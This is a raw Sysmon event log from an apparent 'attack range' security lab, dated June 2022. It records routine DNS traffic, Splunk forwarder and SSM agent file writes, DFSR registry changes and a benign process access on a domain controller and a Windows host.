14:20:32.884{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60953- 354300x8000000000000000205797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:32.298{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57153-true2001:500:200:0:0:0:0:b-53domain 23542300x8000000000000000205796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.349{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CB8A1743990F7D3C12F5CE98FB1781B,SHA256=1F60C3E43ECD4A415A578AF5BAFF6A7CAB5A2632B1C0E8EA26EF3F214FB6724B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.204{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4B970A2DB6770EF312ABDE9B59183D5,SHA256=A9BF6D70014192B2849D36EAE3F96388E58B17B8F50E178EB5586CF3FEC92F48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044635Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:36.467{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C815DA5091FECC71A7F7017B7DBDE36A,SHA256=E1ECFA244C07216DB6C79B2242DF8575475E907E6CEDE1D5B3F06E2EEACA7600,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:33.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-65137- 354300x8000000000000000205803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:33.797{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:213f:5d5:ffff-65137-true7f00:1:0:0:0:0:0:0-53domain 354300x8000000000000000205802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:33.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 354300x8000000000000000205801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:33.797{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x8000000000000000205800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:36.402{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FBD746DA1BB32E43B03B8B9E44C1440,SHA256=4303FE0A5D8383584090290A3C43288A9030842FD0EFFE224B91392A2E673642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044636Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:37.561{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8266F93F14E8351D56915E314DB69C2,SHA256=6395FE1897906D4AC1741B2A916784FF3001B318DCA86353EB8283B52D8F5E4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.177{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62268-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.799{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-65140-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000205816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.799{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local65140-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.799{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51968-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.799{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51968- 354300x8000000000000000205813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.799{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60991-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.798{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60991-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62268-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51968- 354300x8000000000000000205809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.797{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139- 354300x8000000000000000205808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.797{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.797{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local51968-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:34.776{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56408-false10.0.1.12-8000- 23542300x8000000000000000205805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:37.432{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD509996D8A4531275790959797E5E85,SHA256=4219786163937A239E42D0E7565A838246519BE0C3C0FBF8B535B8C754B6C149,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044638Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:36.772{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52374-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044637Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:38.655{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8D0571AE54B5E37BD13F74D1D571B4C,SHA256=37E1501853A22FBCE523BA4473025536D27362BB814DF212AC0E0E68F1FC5178,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205824Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.448{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D07E9C025E677D896374403B928B2D9,SHA256=48F9B20D0756AD10061028505E02C6A79310588431CA0460718EC563246A2330,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205823Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.212{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:9880:2748:5d5:ffff-65140-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x8000000000000000205822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.212{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:fc03:c9e2:b068:9f71win-dc-ct-attack-range-304.attackrange.local65140-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x8000000000000000205821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.177{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:35.177{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139- 23542300x8000000000000000205819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.048{2E1864BB-FA4D-6299-5F07-000000005F02}6532ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\or89gb4t.default-release\datareporting\aborted-session-pingMD5=B268E0F7C5CE6348B0ABED2BE744EAD3,SHA256=D60370530BC0BFB31DEEE74932B3D2DAB8BC96F31570C142F791E433D47090BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205829Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.467{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8C7E849B37638CB4FEDB091CD956D10,SHA256=A30655D3219CF467A5CE4E9975C8780C15FA2212EA8EBC676160238142CA7A41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044639Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:39.748{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4665535F1D94AF979B4DAE3222861223,SHA256=E85B8F6F4514292375D9BD38354B27334C79B59145742B21F1E72955E264830A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205828Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:36.900{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local62602-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205827Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:36.900{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60953- 354300x8000000000000000205826Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:36.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-64729-true2001:503:ba3e:0:0:0:2:30-53domain 354300x8000000000000000205825Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:36.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-57153-true2001:500:9f:0:0:0:0:42-53domain 23542300x8000000000000000205832Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:40.567{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DF3EC9035FE7BAAB72FEEC737D7CA36,SHA256=80591AE3321A1E9D459AAF030871E5DB8699B22ABA52C395D58080B052F92281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044641Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:40.845{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41BE01F91139FEA883B263AB7D44C8C0,SHA256=070E16F0F3225D278406FC059B000AF58C6DE7BE290D020B8B22324EFC8776AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044640Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:40.769{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\respondent-20220603103302-221MD5=1368864ED3964BDCAF310770CE48D2A5,SHA256=F4EE2B140FD43EB5772AE1FE5CF5CF61204868E3BB74D3908306C7C1A703C3E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205831Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:37.812{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137- 354300x8000000000000000205830Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:37.812{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65137-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 23542300x800000000000000044644Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:41.937{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=ACE574F596875A4F87E9480BDFDC0AB6,SHA256=AA1C4EBFE141EB7889D4CAF36FD88CDF9639AD829909BA561AB1CFB2B315FB8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044643Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:41.828{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02B8E9D0CE7EDD5A44153682B4FD2179,SHA256=8A58873D0E7D033C57BD78D4F33F4E2BEDF51C8B45EE108B5D4B2FDAE08DCB05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044642Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:41.784{0A5DF930-E35C-6299-1E00-000000006002}1996NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-05821ca64e01051b6\channels\health\surveyor-20220603103300-222MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.670{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F006CDCB2E4B1FC0BBFDCCD6982A82AD,SHA256=38C42F62A48E7895C16E0981D30C1B151E2B173C45857B49E0F3715CA8A4DC50,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205847Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.244{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61345-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205846Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.023{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205845Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.023{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139- 354300x8000000000000000205844Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:39.022{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63096-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205843Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local61345-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205842Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local63096-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000205841Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local59526- 354300x8000000000000000205840Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.858{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139- 354300x8000000000000000205839Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.858{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local65139-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 354300x8000000000000000205838Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:38.858{2E1864BB-E13E-6299-1500-000000005F02}1072C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local59526-true0:0:0:0:0:0:0:1win-dc-ct-attack-range-304.attackrange.local53domain 13241300x8000000000000000205837Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:41.302{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\76F93978-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_76F93978-0000-0000-0000-100000000000.XML 13241300x8000000000000000205836Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:41.302{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\634CD7B3-42FA-429E-8949-85C1FE2E997C\Config SourceDWORD (0x00000001) 13241300x8000000000000000205835Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-SetValue2022-06-03 14:20:41.302{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\634CD7B3-42FA-429E-8949-85C1FE2E997C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_634CD7B3-42FA-429E-8949-85C1FE2E997C.XML 10341000x8000000000000000205834Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:41.286{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E14E-6299-2F00-000000005F02}1280C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205833Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 